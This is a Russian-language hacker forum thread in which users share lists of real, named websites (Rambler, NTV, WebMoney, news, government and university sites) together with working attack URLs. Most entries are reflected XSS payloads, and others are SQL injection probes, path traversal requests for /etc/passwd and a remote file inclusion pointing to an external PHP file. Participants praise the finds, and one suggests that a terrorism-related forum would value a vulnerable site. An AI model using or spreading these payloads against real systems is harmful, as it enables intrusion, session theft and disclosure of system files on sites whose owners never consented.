Бажные сайты от k1b0rg'a

Вообщем небольшое предисловие.
Раньше я хотел назвать и тему 667 бажных сайтов, и их действительно столько у меня, но с некоторыми обстоятельствами, я не могу выложить(или выложу потом, по частям.) Все "уязвимости" найдены мною, все совпадения случайности, на момент опубликования, все работало. Естественно я не все крупные ресурсы выложил.
Скачать можно по этой ссылке.
http://kobeluga.narod.ru/bugs.txt

p.s. если кому то помогло, то как отблагодарить знаете(репутация) =)))

 

ne ploho jdem prodoljeniea banketa

 

2k1b0rg вот молодчик! секлаб яндекс вебхак рамблер - респект вобщем)

 

хех, продолжение будет, если данные востановлю после вируса(кто посоветует нормальный антивирус, а то без него хреново)
даже если не востаовлю думаю, я найду способ, еще запостить (скидываем мне в приват сайты) =))

 

так так значит выложил то наконец=))) с меня репутация!)

 

Что то я там секлаб не нашёл.

 

2k00p3r хм... я точно видел секлабу в списке вчера, может k1b0rg удалил или я с sitecity попутал

 

секлаб был, но так как уже там бага не работает, я ее прикрыл, и веб хак удалил

 

Где именно была бага на секлабе?

 

вот хасаса, только реальный алерт вставлять не советую(он вылетит 200+ раз)

PHP:

http://audio.rambler.ru/archive.html?s=19311)%22%3E%3Cscript%3Eno-no%3C/script%3E%3Ca%20%22

еще одна, вылетает, где-то 7

PHP:

http://horoscopes.rambler.ru/day.html?day=1&month=4&year=1900"><script>alert()</script>

и еще под IE нашёл

Code:

http://vision.rambler.ru/srch/?sort=0&set=vision&control_charset=%CA%EE%ED%F2%F0%EE%EB%FC&words=%22%20style=%22background:url(javascript:alert('я%20люблю%20max_pain89'))

 

http://www.pro-hack.ru/tools/ip.html?myname=<script>alert()</script>&ipname=&search=
http://geo.webmoney.ru/asp/wmobjects_in_moscow.asp?al=0"><script>alert()</script>
http://zloy.org/news/686'/index.html
http://www.cyberinfo.ru/cgi-bin/proxy/proxy.cgi?host=<script>alert()</script>&port=8080
http://skvoznoy.org/news-cat/21'/
http://w-hack.net/index.php?option=content&task=category&sectionid=3"%20style=background:url(javascript:alert());"&id=69&Itemid=27
http://www.kkunst.com/kk/print.php?file='
http://top.voffka.com/search.php?key=<script>alert()</script>&cat=Overall
http://www.leg.state.fl.us/statutes...g="+style=background:url(javascript:alert());
http://search.mcc.ac.uk/cgi-bin/htsearch?config=mhn&words="><script>alert()</script>&x=0&y=0
http://koffiejunk.nl/?file=<script>alert()</script>
http://www.oil-gas.com.ua/data/rus/showdoc.php?file=<script>alert()</script>
http://www.frozenlight.de/engine/show.php?file=<script>alert()</script>
http://www.globalschoolbus.com/tools/tool_page.php?file=\
http://www.cairchicago.org/ournews.php?file=<script>alert()</script>
http://chrisken.utacm.org/cksource.php?file=/home/chrisken/www/code/ckSource.php
http://wwwx.cs.unc.edu/~jsterrel/test/viewsource.php?file=viewsource.php
http://foreverblue.alsgekken.nl/showdoc.php?file=http://kobeluga.narod.ru/nst.php
http://www.nesprogramme.org/download.php?file=../../../../../../../../../../../../etc/passwd
http://www.bissettmags.com.au/cgi-b..../../../../../../../../../../../../etc/passwd
http://www.frostjedi.com/terra/scripts/graemlin/viewsource.php?file=graemlin.php
http://www.theater-schwedt.de/index.php?file=../../../../../../../../../../../../etc/passwd&mex=7
http://beer.km.ru/index.php?file=/etc/passwd
http://www.bobdev.com/downloadstats.php?File=<script>alert()</script>
http://www.mercenaries.ru/inf/newcomm.php?type=gallery&nick=%21+%21+%21+MAXIMILIAN+%21+%21+%21"><script>alert()</script>&page=1

 

Неплохой список могу токо добавить....
http://www.ntv.ru/news/NewsSearchRe...eytext=/><script>alert('Warning_DT')</script>
сегодня нашол ...долго смеялся...НТВ всётаки...хеех

 

Молодец.Так держать.

 

Да... действительно молодец!

 

http://www.phrack.org/search/index.php?author=&andor=or&title="%20style=background:url(javascript:alert());"&comment=&submit=submit
http://www.xakep.ru/local/include/iframe_rateit.asp?filedir=25244"><script>alert()</script>
http://otdell.bs.by/show.html?words="><script>alert()</script>
http://www.missworld.tv/bio/bio.sps?iBiographyID=51851'
http://www.latin.ru/cgi-bin/search/odm.pl?search="><script>alert()</script>
http://yellowpages.rin.ru/cgi-bin/s...&z=TM&text="><script>alert()</script>&srt=not
http://www.linuxchile.cl/docs.php?op=ver&id=65'
http://www.hw.ru/hi-tech/recordUsers1.jsp?login="><script>alert()</script>
http://www.superq.ru/comments.php?id=82_0_1_0_C"><script>alert()</script>
https://[любой_сайт_использующий_webmoney_transfer].webmoney.ru/conf/pci_testlink.asp?A=1</xmp><script>alert(1)</script>&b=1<script>alert(2)</script>
http://xtools.org/"%20style=background:url(javascript:alert());".cfm?nft=1&t=6&p=1

 

http://netsec.ru/modules.php?name=articles&theme=7</a><script>alert()</script>&page=stat&read=yes&mess=1131536252
http://www.ixbt.com/news/index.php?str=<script>alert()</script>&x=0&y=0
http://news.ntv.ru/74629<script>alert()</script>/
http://www.gazeta.ru/cgi-bin/newexport/export?action=show&uid=0'&cid=1
http://www.pokupaj.ru/pokupaj.php?sub_=bt&search_=<script>alert()</script>&id=92
http://pharma-cosmetics.ru/results.php?searchterm=<script>alert()</script>
http://www.filemirrors.com/search.src?type=begins&file=<script>alert()</script>
http://softportal.com/search.php?search=1&search_string=<script>alert()</script>
http://city.zp.ua/search.phtml?sear...t%28%29%3C%2Fscript%3E&Submit=%ED%E0%E9%F2%E8
http://www.drocher.ru/good.php?rubric_id=29"><script>alert()</script>
http://top.netsec.ru/image2.png?icq=%20288983987&[email protected]&name=Green%20Bear&img=1'
http://de.shareware-download.org/"style=background:url(javascript:alert());.php
http://www.nodevice.ru [POST] sql инъекция в поиске (в 3 параметрах)
http://mirrors.zero-united.com/resu...Y&Keywords=<script>alert()</script>&original=
http://viewstat.hotlog.ru/site_stat.php?&HOTLOG_SESSION='
http://hostland.ru/services/domain/...E&zone=0&Submit=+%CF%F0%EE%E2%E5%F0%E8%F2%FC+

 

на моем сайте не смотреть, я исправил =))).
спасибо киборг -))

 

дя? я даже не знал, что он твой.
где-то увидел ссылку решил зайти посмотреть что к чему.
пока я не нашол ни одной уязвимости(из всех сайтов которые я успел просмотрел) на аничате.ру и асечке.ру=))) респект

 

НЕ доставайте меня с просьбой продать мой сканер, которым я сканирую сайты!!!! у меня его нету, проверяю все РУКАМИ!!!
http://sheriff.md/Search/?Text='+style=background:url(JaVaScRipT:alert());'
http://www.homegain.com/real_estate/index?ht=pnf_rc&entryid=5803"><script>alert()</script>
http://audio.kavkazcenter.com/review.php?sid=135'><script>alert()</script>
http://aviabilet.ru/avia/avia/avia_searchres_t?SEARCHFOR=<script>alert()</script>&x=0&y=0
http://catalog.begun.ru/?q='"><script>alert()</script>
http://slogan.anub.ru/?slogan="style=background:url(javascript:alert());"
http://ru-traffic.com/pgo.php?partner=10407&alarm=1&url=><script>alert()</script>
http://www.gsm-shop.com.ua/index.php?cat=58'
http://www.web-hosting.ru/whois.php?domain=<script>alert()</script>&ext=ru

 

Вот про енто http://audio.kavkazcenter.com/review.php?sid=135'><script>alert()</script> я могу вам так прямо сказать, что наодном форуме(не буду рекламировать) тебе были бы очень благодарны.
Это тот который про террористов.